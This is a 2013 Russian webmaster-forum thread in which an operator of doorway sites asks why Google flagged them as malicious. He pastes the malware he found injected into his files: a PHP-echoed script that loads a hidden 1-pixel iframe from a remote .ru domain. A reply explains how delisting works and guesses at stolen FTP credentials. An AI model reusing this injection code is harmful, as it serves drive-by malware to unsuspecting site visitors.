X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Помогите разобратся
kesn
kesn
Topic Starter сообщение 22.1.2013, 15:20; Ответить: kesn
Сообщение #1


Топовый постер
*******


Группа: Active User
Сообщений: 5100
Регистрация: 20.9.2008
Из: опринозин
Поблагодарили: 1988 раз
Репутация:   481  


Мужики подскажите че делать, гугл все доры поблакировал.
Везде в серпе Предупреждение - посещение этого сайта может нанести вред Вашему компьютеру!
650 дорвеев пострадали, код ниже я его выложил. Трафф с 25к в сутки упал до 3 человек, охренеть...
На всех дорах пишет что вирус вызывался с тдски, точнее с хтаккса где была размещена дрянь.
Вот пример моего сайта нулячего где размещена эта дрянь http://emcala.com/


Безопасный просмотр
Страница диагностики для blabla.com

Занесен ли сайт blabla.com в список подозрительных?

Сайт занесен в список подозрительных. Посещение этого сайта может нанести вред вашему компьютеру.

В некоторой части этого сайта за последние 90 дней была замечена подозрительная активность (число таких случаев: 1).

Что произошло во время последнего посещения этого сайта компанией Google?
На 0 из 3 страниц сайта, протестированных нами за последние 90 дней, происходила загрузка и установка вредоносного ПО без согласия пользователя. Последнее посещение этого сайта системой Google произошло 2013-01-21; последний раз подозрительный контент был обнаружен на этом сайте 2013-01-21.

Вредоносное ПО включает 656 exploit(s).

Сетей, в которых размещался этот сайт: 1 (в том числе (CAMELHOST)).

Был ли этот сайт промежуточным звеном в дальнейшем распространении вредоносного ПО?

По всей видимости, за последние 90 дней сайт blabla.com использовался в качестве промежуточного звена для заражения других сайтов. Число зараженных сайтов: 48 (в том числе site1.by/, site2.com/, site3.us/).

Размещалось ли на этом сайте вредоносное ПО?

Да. За последние 90 дней на этом сайте размещалось вредоносное ПО. Число зараженных им доменов: 48 (в том числе site2.com/, site1.us/, site3.com/).



Вот такая дрянь размещена в хтаксе и почти во всех файлах тдски расширения php, html:



#e2aa4e#
                                                                                                                                                                                                                                                          echo "                                                                                                                                                                                                                                                          <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                          (function () {    var zzf = document.createElement('iframe');    zzf.src = 'http://sumjecyg.ru/count15.php';    zzf.style.position = 'absolute';    zzf.style.border = '0';    zzf.style.height = '1px';    zzf.style.width = '1px';    zzf.style.left = '1px';    zzf.style.top = '1px';    if (!document.getElementById('zzf')) {        document.write('<div id=\'zzf\'></div>');        document.getElementById('zzf').appendChild(zzf);    }})();</script>";

#/e2aa4e#



А скрипт вызывался с файла share42.js

http://whoistory.com/2012/12/22/ домен http://sumjecyg.ru/ на котором стоит крипт был зареган недавно, вот м*даки, весь биз подосрали.

Дрянь эту я везде поубирал впринципе, перенес доры на другой серв, как долго теперь ждать когда это предупреждение уберется и уберется ли оно вообще?

.

Сообщение отредактировал kesn - 22.1.2013, 14:59


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
ne0n
ne0n
сообщение 24.1.2013, 18:54; Ответить: ne0n
Сообщение #2


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 22.7.2010
Поблагодарили: 0 раз
Репутация:   0  


Сталкивался на обычных проектах (не дорвеях), если все вычистили, то предупреждения исчезнут после очередной проверки ПС (не больше 3х дней вроде у Гугл у меня было).

P.S. По #e2aa4e# предположу, что скорее всего у вас вредоносное ПО увело пароли от FTP и по FTP обновило файлы. Возможно повторится такое и на другом сервере. Поищите у себя на компьютере(ах) вирусы от куда ходите по FTP на сервер. Но это конечно не 100%, может так помечает свой код не только такое ПО.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


Сообщение отредактировал ne0n - 24.1.2013, 19:04
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Помогите, пожалуйста, моей дочери выжить!
благотворительный топик
30 vitvirtual 3794 19.5.2018, 8:30
автор: vitvirtual
Открытая тема (нет новых ответов) Продвигаю страницу по запросу "Как сделать игру". Помогите советом, пожалуйста
Я секу в теме! Но подать статью угодным поисковикам образом не смо
22 coremission 2202 8.5.2018, 12:33
автор: coremission
Открытая тема (нет новых ответов) Помогите с выбором ноута
20 rokot 905 23.4.2018, 12:09
автор: Room
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыПомогите с идеями для форума про успех
Спасибо за каждую идею
43 Zoya83 5173 12.4.2018, 11:42
автор: Zoya83
Открытая тема (нет новых ответов) Лендинг или сайт-визитка для ИП? Помогите определиться
6 Yas18 1139 31.3.2018, 20:57
автор: Yas18


 



RSS Текстовая версия Сейчас: 26.5.2018, 1:03
Дизайн